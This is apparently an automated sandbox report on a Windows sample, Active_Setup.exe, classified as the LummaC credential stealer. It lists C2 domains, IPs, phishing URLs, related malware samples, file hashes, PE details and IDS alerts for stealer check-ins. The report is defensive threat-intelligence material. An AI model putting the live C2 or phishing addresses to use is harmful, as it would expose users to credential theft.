Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Active_Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/3@4/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 23
• Number of non-executed functions: 202
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7956 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Active_Setup.exe
| Time | Type | Description |
|---|---|---|
| 12:19:11 | API Interceptor | 10x Sleep call for process: Active_Setup.exe modified |
| 12:19:27 | API Interceptor | 5x Sleep call for process: powershell.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 104.21.37.128 | @Setup.exe | malicious | LummaC Stealer | |
| 104.21.37.128 | installer_1.05_36.4.exe | malicious | LummaC Stealer | |
| 104.21.37.128 | !Setup.exe | malicious | LummaC Stealer | |
| 104.21.37.128 | Full_Setup.exe | malicious | LummaC Stealer | |
| 188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/ |
| 188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/ |
| 188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45 |
| 188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq |
| 188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25 |
| 188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/ |
| 188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download |
| 188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico |
| 188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/ |
| 188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check |
| 185.161.251.21 | installer_1.05_36.5.exe | malicious | LummaC | |
| 185.161.251.21 | @Setup.exe | malicious | LummaC Stealer | |
| 185.161.251.21 | Winter.mp4.hta | malicious | LummaC | |
| 185.161.251.21 | MdhO83N5Fm.exe | malicious | LummaC | |
| 185.161.251.21 | installer_1.05_36.4.exe | malicious | LummaC Stealer | |
| 185.161.251.21 | !Setup.exe | malicious | LummaC Stealer | |
| 185.161.251.21 | @Setup.exe | malicious | LummaC | |
| 185.161.251.21 | Full_Setup.exe | malicious | LummaC Stealer | |
| 185.161.251.21 | appFile.exe | malicious | LummaC Stealer | |

Note on the IP pivot: 104.21.37.128 and 188.114.97.3 are Cloudflare edge addresses (AS13335) fronting the stealer's C2 domains, and the 188.114.97.3 matches span FormBook, Snake Keylogger, Ducktail and unrelated phishing pages, which is the normal noise of a shared Cloudflare address rather than evidence of shared infrastructure. The matches on the domains themselves (cegu.shop, klipvumisui.shop) are the reliable pivot; the IP rows should not be used as indicators on their own.
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| cegu.shop | installer_1.05_36.5.exe | malicious | LummaC | 185.161.251.21 |
| cegu.shop | @Setup.exe | malicious | LummaC Stealer | 185.161.251.21 |
| cegu.shop | Winter.mp4.hta | malicious | LummaC | 185.161.251.21 |
| cegu.shop | MdhO83N5Fm.exe | malicious | LummaC | 185.161.251.21 |
| cegu.shop | installer_1.05_36.4.exe | malicious | LummaC Stealer | 185.161.251.21 |
| cegu.shop | !Setup.exe | malicious | LummaC Stealer | 185.161.251.21 |
| cegu.shop | @Setup.exe | malicious | LummaC | 185.161.251.21 |
| cegu.shop | Full_Setup.exe | malicious | LummaC Stealer | 185.161.251.21 |
| cegu.shop | appFile.exe | malicious | LummaC Stealer | 185.161.251.21 |
| klipvumisui.shop | installer_1.05_36.5.exe | malicious | LummaC | 172.67.208.58 |
| klipvumisui.shop | @Setup.exe | malicious | LummaC Stealer | 104.21.37.128 |
| klipvumisui.shop | MdhO83N5Fm.exe | malicious | LummaC | 172.67.208.58 |
| klipvumisui.shop | installer_1.05_36.4.exe | malicious | LummaC Stealer | 104.21.37.128 |
| klipvumisui.shop | !Setup.exe | malicious | LummaC Stealer | 104.21.37.128 |
| klipvumisui.shop | @Setup.exe | malicious | LummaC | 172.67.208.58 |
| klipvumisui.shop | Full_Setup.exe | malicious | LummaC Stealer | 104.21.37.128 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| CLOUDFLARENETUS | setup.msi | malicious | Unknown | 104.21.0.151 |
| CLOUDFLARENETUS | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 104.17.25.14 |
| CLOUDFLARENETUS | random.exe | malicious | LummaC | 104.21.64.143 |
| CLOUDFLARENETUS | https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 1.1.1.1 |
| CLOUDFLARENETUS | https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857 | malicious | KnowBe4 | 104.18.87.62 |
| CLOUDFLARENETUS | BHgwhz3lGN.exe | malicious | Vidar | 172.64.41.3 |
| CLOUDFLARENETUS | UmotQ1qjLq.exe | malicious | LummaC | 104.21.96.1 |
| CLOUDFLARENETUS | PI1EA8P74K.exe | malicious | LummaC | 172.67.148.118 |
                                                                                                                                                https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.18.35.227
                                                                                                                                                CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.0.151
                                                                                                                                                https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.64.143
                                                                                                                                                https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                • 104.18.87.62
                                                                                                                                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 172.64.41.3
                                                                                                                                                UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.96.1
                                                                                                                                                PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.148.118
                                                                                                                                                https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.18.35.227
                                                                                                                                                NTLGBbotx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 82.31.53.184
                                                                                                                                                botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 62.31.100.59
                                                                                                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 82.37.70.27
                                                                                                                                                loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 82.42.160.251
                                                                                                                                                loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 163.164.159.5
                                                                                                                                                sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 86.17.1.166
                                                                                                                                                x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 82.16.218.110
                                                                                                                                                installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                No context
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1510207563435464
Encrypted:false
SSDEEP:3:Nlllullkv/tz:NllU+v/
MD5:6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:false
Reputation:moderate, very likely benign file
Preview:@...e................................................@..........

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):0.5723397968533982
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Active_Setup.exe
                                                                                                                                                File size:76'054'693 bytes
                                                                                                                                                MD5:b106a3a66916985d5e5b6cbbb6c5b07c
                                                                                                                                                SHA1:91ac93059958c0267bd8a909ed83284fdc8e4c7d
                                                                                                                                                SHA256:195f6445fe4cc70d48c65e973008336c82a0455163e51152c05f2b4ce32963f5
                                                                                                                                                SHA512:8d95044211c28ab5ca20db1428ef875937455edd54e47ea8153595b45a517883f25b19114ead459d27046ce31f28e2958a13436c5a7510814c5fafd4d4565b04
                                                                                                                                                SSDEEP:24576:lo/ZNcUCnAyxEsZK3gYaRzHKFzc+Te7pnPkEGBWSp/Mcd//vXui12Sf:4GntEx3gYajWBnp/Mcd//v+G2Sf
                                                                                                                                                TLSH:03F7D4B2FE00BAF2978AC9ED05A2DAD9D9B663003333E8F751453586ED0B4D84336D59
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........$...w...w...wr..w...w...w...w...w...w...w...w...wk..w...w...w...w...w...w...w...w...wRich...w........PE..L...i.Gc...........
                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                Entrypoint:0x4d0da5
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x6347D069 [Thu Oct 13 08:46:33 2022 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:732f95b0ac9f9cb56d01e5eebb88cf9d
                                                                                                                                                Signature Valid:false
Signature Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 15/12/2020 21:24:20
Not After: 02/12/2021 21:24:20
Subject Chain:
• CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version: 3
Thumbprint MD5: 4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1: 914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256: 4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial: 33000003DFFB6AE3F427ECB6A30000000003DF
Instruction (entry-point disassembly listing not reproduced)
Programming Language:
• [C++] VS2008 SP1 build 30729
• [ASM] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [EXP] VS2008 SP1 build 30729
• [LNK] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x136e50 | 0x6a2 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1362a0 | 0x64 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x147000 | 0x1b4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4885ed5 | 0x21d0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x148000 | 0xbf90 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xef2b0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x134530 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xef000 | 0x248 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xed507 | 0xed600 | f4c6c87c3321c5bdf5a08e357cc11ed9 | False | 0.5379578890205371 | data | 6.607370994218835 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xef000 | 0x484f2 | 0x48600 | 6f9c7f42ab9cd82190fb05d5d2bb6881 | False | 0.43556374136442144 | SysEx File - | 6.019471426718993 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x138000 | 0xe088 | 0xa200 | 61975acd4e39ef4cdbd6617378b6676a | False | 0.4645061728395062 | data | 5.1688262052545095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x147000 | 0x1b4 | 0x200 | 358be7eb293f99952f6352ce11438b64 | False | 0.490234375 | data | 5.112623549532036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x148000 | 0x5e000 | 0x5e000 | 5cd12960aca52fa7f87895e7ca56218f | False | 0.6562006524268617 | data | 7.5389648445350685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x147058 | 0x15a | ASCII text, with CRLF line terminators | English | United States | 0.5491329479768786 |
DLL: Imports
WS2_32.dll: gethostname, ioctlsocket, getaddrinfo, freeaddrinfo, connect, socket, closesocket, getpeername, getsockopt, htons, bind, ntohs, getsockname, setsockopt, WSAIoctl, send, recv, select, WSAGetLastError, __WSAFDIsSet, WSASetLastError, WSAStartup, WSACleanup, shutdown
KERNEL32.dll: GetStringTypeW, GetStringTypeA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetTimeZoneInformation, InitializeCriticalSectionAndSpinCount, GetProcessHeap, SetStdHandle, GetCurrentDirectoryA, GetFullPathNameA, FlushFileBuffers, CreateMutexW, WaitForSingleObject, GetLastError, ReleaseMutex, CloseHandle, Sleep, SetEndOfFile, SetFilePointerEx, WriteFile, WideCharToMultiByte, TerminateThread, GetFileAttributesW, CreateFileW, MoveFileW, GetCurrentThreadId, DeleteFileW, GetTickCount, DeleteCriticalSection, InitializeCriticalSection, LeaveCriticalSection, EnterCriticalSection, SetLastError, SleepEx, GetVersionExA, FormatMessageA, ExpandEnvironmentStringsA, GetProcAddress, GetModuleHandleA, GetVersion, GetFileType, GetStdHandle, MultiByteToWideChar, QueryPerformanceCounter, GlobalMemoryStatus, FreeLibrary, LoadLibraryA, FlushConsoleInputBuffer, SystemTimeToFileTime, GetSystemTime, LCMapStringW, LCMapStringA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, VirtualAlloc, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, CompareStringA, GetLocaleInfoW, CompareStringW, SetEnvironmentVariableA, GetCurrentProcessId, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, ReadFile, ExitThread, CreateThread, GetSystemTimeAsFileTime, HeapFree, HeapReAlloc, HeapAlloc, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, GetDriveTypeA, FindFirstFileA, CreateFileA, GetModuleHandleW, ExitProcess, SetConsoleCtrlHandler, ReadConsoleInputA, SetConsoleMode, GetConsoleMode, RtlUnwind, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, InterlockedDecrement, GetConsoleCP, RaiseException, SetHandleCount, GetStartupInfoA, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetModuleFileNameA, HeapCreate, VirtualFree
USER32.dll: MessageBoxA, GetProcessWindowStation, GetUserObjectInformationW, PostThreadMessageW
ADVAPI32.dll: ReportEventA, DeregisterEventSource, RegisterEventSourceA
| Name | Ordinal | Address |
|---|---|---|
| curl_easy_cleanup | 6 | 0x406100 |
| curl_easy_duphandle | 7 | 0x406180 |
| curl_easy_escape | 8 | 0x420d20 |
| curl_easy_getinfo | 9 | 0x406160 |
| curl_easy_init | 10 | 0x405ee0 |
| curl_easy_pause | 11 | 0x4063f0 |
| curl_easy_perform | 12 | 0x405f50 |
| curl_easy_recv | 13 | 0x4065a0 |
| curl_easy_reset | 14 | 0x406350 |
| curl_easy_send | 15 | 0x406600 |
| curl_easy_setopt | 16 | 0x405f20 |
| curl_easy_strerror | 17 | 0x415a40 |
| curl_easy_unescape | 18 | 0x420ef0 |
| curl_escape | 19 | 0x420f70 |
| curl_formadd | 20 | 0x4252a0 |
| curl_formfree | 21 | 0x425490 |
| curl_formget | 22 | 0x425d30 |
| curl_free | 23 | 0x420f50 |
| curl_getdate | 24 | 0x4244e0 |
| curl_getenv | 25 | 0x420c90 |
| curl_global_cleanup | 26 | 0x405e90 |
| curl_global_init | 27 | 0x405d80 |
| curl_global_init_mem | 28 | 0x405e10 |
| curl_maprintf | 29 | 0x4157b0 |
| curl_mfprintf | 30 | 0x415930 |
| curl_mprintf | 31 | 0x415900 |
| curl_msnprintf | 32 | 0x414dc0 |
| curl_msprintf | 33 | 0x4158d0 |
| curl_multi_add_handle | 34 | 0x40f460 |
| curl_multi_assign | 35 | 0x40f350 |
| curl_multi_cleanup | 36 | 0x40ebf0 |
| curl_multi_fdset | 37 | 0x40ea80 |
| curl_multi_info_read | 38 | 0x40ece0 |
| curl_multi_init | 39 | 0x40e910 |
| curl_multi_perform | 40 | 0x410940 |
| curl_multi_remove_handle | 41 | 0x40fa90 |
| curl_multi_setopt | 42 | 0x40ee50 |
| curl_multi_socket | 43 | 0x410c30 |
| curl_multi_socket_action | 44 | 0x410c60 |
| curl_multi_socket_all | 45 | 0x410ca0 |
| curl_multi_strerror | 46 | 0x415db0 |
| curl_multi_timeout | 47 | 0x40eff0 |
| curl_multi_wait | 48 | 0x40f5f0 |
| curl_mvaprintf | 49 | 0x415840 |
| curl_mvfprintf | 50 | 0x4159b0 |
| curl_mvprintf | 51 | 0x415980 |
| curl_mvsnprintf | 52 | 0x414d60 |
| curl_mvsprintf | 53 | 0x415950 |
| curl_share_cleanup | 54 | 0x41a2b0 |
| curl_share_init | 55 | 0x41a0f0 |
| curl_share_setopt | 56 | 0x41a110 |
| curl_share_strerror | 57 | 0x415e20 |
| curl_slist_append | 58 | 0x411a20 |
| curl_slist_free_all | 59 | 0x411a60 |
| curl_strequal | 60 | 0x423620 |
| curl_strnequal | 61 | 0x423640 |
| curl_unescape | 62 | 0x420f90 |
| eud_cancel | 4 | 0x403f40 |
| eud_download | 3 | 0x403d90 |
| eud_get_progress | 5 | 0x403f60 |
| eud_init | 1 | 0x403d20 |
| eud_uninit | 2 | 0x403d70 |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T18:19:11.591616+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:12.261155+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:12.261155+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:12.741413+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:13.229866+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:13.229866+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:13.996351+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:15.154663+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:16.620362+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
